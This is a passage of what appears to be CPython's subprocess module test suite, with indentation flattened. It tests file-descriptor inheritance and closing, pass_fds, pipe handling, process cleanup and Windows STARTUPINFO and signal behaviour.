out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duplicating fds, if one of the fds involved is 0, 1 or 2, it is
# possible for it to be overwritten (#12607).  The test below covers all
# permutations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
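# Note (editor's addition): the cloexec tests below pass even with
# close_fds=False because, per PEP 446, the pipe fds Popen creates for one
# child stay non-inheritable in the parent, so they do not leak into an
# unrelated child started afterwards.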
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. Ideally we would start with a valid
# *args list, confirm that a good call works, and then mutate it
# in various ways to check that each bad argument type raises a
# TypeError. Saving that refactoring for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the exact returncode value: the test already consumed the
# exit status, so Popen could not read it and falls back to a default
# returncode instead.
self.assertIsNotNone(proc.returncode)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USESHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
